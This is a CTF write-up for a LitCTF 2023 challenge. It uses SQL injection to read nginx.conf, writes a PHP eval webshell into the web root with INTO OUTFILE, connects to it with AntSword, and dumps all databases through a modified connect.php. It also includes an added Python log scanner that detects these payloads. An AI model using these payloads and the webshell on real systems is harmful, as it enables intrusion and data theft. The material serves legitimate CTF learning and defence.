
Getting the database after getting a shell

Cyber security

How to get a shell

Using [LitCTF 2023] 这是什么?SQL !注一下 ! as the example: SQL injection is used to write a one-line webshell and gain remote control of the OS. A more detailed walkthrough is in Sql注入os远程控制.md.

Information gathering

Finding the web root

Next, read the nginx configuration file.

# payload:
?id=-1)))))) union select load_file('/etc/nginx/nginx.conf'),2%23

Response:
daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } } }
Tidied up:
# Run nginx as a foreground process
daemon off;

# Set the number of worker processes automatically from the available CPU cores
worker_processes auto;

# Error log path and log level
error_log /var/log/nginx/error.log warn;

# Event-handling module configuration
events {
    # Maximum number of simultaneous connections per worker process
    worker_connections 1024;
}

# HTTP server configuration
http {
    # Include the MIME type definitions
    include /etc/nginx/mime.types;

    # Default MIME type
    default_type application/octet-stream;

    # Enable sendfile for faster file transfers
    sendfile on;

    # Keep-alive timeout
    keepalive_timeout 65;

    # Virtual host configuration
    server {
        # Listen on port 80
        listen 80;

        # Server name
        server_name localhost;

        # Root directory of the website files
        root /var/www/html;

        # Default index file
        index index.php;

        # Proxy header settings
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

        # Handling rule for the root location
        location / {
            try_files $uri $uri/ /index.php?$args;
        }

        # Handling rule for PHP files
        location ~ \.php$ {
            try_files $uri =404;
            fastcgi_pass 127.0.0.1:9000;
            fastcgi_index index.php;
            include fastcgi_params;
            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        }
    }
}

Web root found: /var/www/html

Write a PHP probe

# payload:
?id=-1)))))) union select '<?php phpinfo();?>',2 into outfile '/var/www/html/info.php'%23

Then visit http://node5.anna.nssctf.cn:24209/info.php
The phpinfo page shows a lot of useful information; if the challenge author was careless, the flag may even be here.

Write a webshell

# payload:
?id=-1)))))) union select '<?php eval($_POST["attack"]);?>',2 into outfile '/var/www/html/attack.php'%23

We have now created attack.php in /var/www/html/.
Connect with AntSword: http://node6.anna.nssctf.cn:28413/attack.php
Password: attack
After that you can do whatever you want.
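From the defender's side, the whole chain above leaves a clear trail in the nginx access log: a `union select load_file(...)` read, an `into outfile` write under the web root, and then requests to the file that was written. The following is an added example, not part of the original writeup: a small Python scanner over constructed nginx combined-format log lines that flags those markers and correlates later requests with the dropped file (the web root `/var/www/html` is taken from the nginx.conf recovered above).

```python
import re
from urllib.parse import unquote_plus

# Constructed nginx "combined" access-log lines (not from the original page). Lines 2 and 3
# carry the load_file / INTO OUTFILE payloads shown in this writeup; line 4 is the follow-up
# request to the dropped file; line 1 is benign.
SAMPLE_LOG = r'''
10.0.0.5 - - [20/May/2023:12:01:02 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [20/May/2023:12:01:07 +0000] "GET /?id=-1))))))%20union%20select%20load_file('/etc/nginx/nginx.conf'),2%23 HTTP/1.1" 200 1944 "-" "curl/8.0"
10.0.0.9 - - [20/May/2023:12:01:15 +0000] "GET /?id=-1))))))%20union%20select%20'%3C%3Fphp%20eval(%24_POST%5B%22attack%22%5D)%3B%3F%3E',2%20into%20outfile%20'/var/www/html/attack.php'%23 HTTP/1.1" 200 0 "-" "curl/8.0"
10.0.0.9 - - [20/May/2023:12:01:20 +0000] "POST /attack.php HTTP/1.1" 200 88 "-" "curl/8.0"
'''

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
                    r'\d{3} \S+ "[^"]*" "[^"]*"')

# Rules run over the decoded, lower-cased, whitespace-collapsed request target.
RULES = [
    ("union-select",       re.compile(r"union\s+(all\s+)?select")),
    ("load_file",          re.compile(r"load_file\s*\(")),
    ("into-outfile",       re.compile(r"into\s+(out|dump)file")),
    ("php-tag-in-query",   re.compile(r"<\?php")),
    ("comment-terminator", re.compile(r"(#|--\s|/\*)\s*$")),
]
OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s+'([^']+)'")
WEB_ROOT = "/var/www/html"   # the root recovered from nginx.conf in the writeup

def normalize(target):
    """URL-decode twice (catches double encoding), collapse whitespace, lower-case."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(target))).lower()

def scan_log(text):
    """Return [(ip, method, raw_target, [rule names])] for every suspicious line; also remember
    files written under WEB_ROOT via INTO OUTFILE and flag later requests to them."""
    findings, dropped = [], set()
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = normalize(m.group("target"))
        hits = [name for name, rx in RULES if rx.search(target)]
        om = OUTFILE_RE.search(target)
        if om and om.group(1).startswith(WEB_ROOT):
            dropped.add(om.group(1)[len(WEB_ROOT):])   # e.g. /attack.php
        if target.split("?", 1)[0] in dropped:
            hits.append("request-to-dropped-file")
        if hits:
            findings.append((m.group("ip"), m.group("method"), m.group("target"), hits))
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports the two injection requests and the later `POST /attack.php`, while the benign `/?id=1` request is not reported.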

How to get the database

After connecting with AntSword you can see connect.php, with the following contents:

<?php
  $servername = "localhost";
  $username = "root";
  $password = "123456";
  $dbname = "ctf";

  $conn = new mysqli($servername, $username, $password, $dbname);

  if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
  }
?>

The database connection details are visible:
1. servername = "localhost";
2. username = "root";
3. password = "123456";
4. dbname = "ctf";
Since connect.php already holds these connection details, modifying it is enough to dump the database.
The modified code is as follows:

<?php
  $servername = "localhost";
  $username = "root";
  $password = "123456";
  $dbname = "ctf";

  $conn = new mysqli($servername, $username, $password, $dbname);

  if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
  }

  // Get the list of all databases
  $sql = "SHOW DATABASES";
  $result = $conn->query($sql);

  // Iterate over all databases
  while ($database = $result->fetch_assoc()) {
    $dbName = array_values($database)[0];

    // Select the database
    if ($conn->select_db($dbName)) {
      echo "Contents of database: " . $dbName . "<br>";

      // Get the list of all tables in the database
      $tablesSql = "SHOW TABLES FROM `" . $dbName . "`";
      $tablesResult = $conn->query($tablesSql);

      // Iterate over all tables
      while ($table = $tablesResult->fetch_assoc()) {
        $tableName = array_values($table)[0];

        // Print the table name
        echo "Contents of table: " . $tableName . "<br>";

        // Fetch and print all rows of the table
        $tableSql = "SELECT * FROM `" . $tableName . "`";
        $tableResult = $conn->query($tableSql);

        if ($tableResult) {
          // Print the column names
          echo "<table border='1'><tr>";
          while ($fieldinfo = $tableResult->fetch_field()) {
            echo "<td>" . $fieldinfo->name . "</td>";
          }
          echo "</tr>";

          // Print the rows
          while ($row = $tableResult->fetch_assoc()) {
            echo "<tr>";
            foreach ($row as $value) {
              echo "<td>" . htmlspecialchars((string) $value) . "</td>";
            }
            echo "</tr>";
          }
          echo "</table><br>";
        } else {
          echo "Error: " . $tableSql . "<br>" . $conn->error;
        }
      }
    } else {
      echo "Cannot select database: " . $dbName . "<br>";
    }
  }

  // Close the connection
  $conn->close();
?>

Then visit connect.php: it prints every table in every database, with column names and rows.
Ctrl+F for the keyword ctf to find the answer.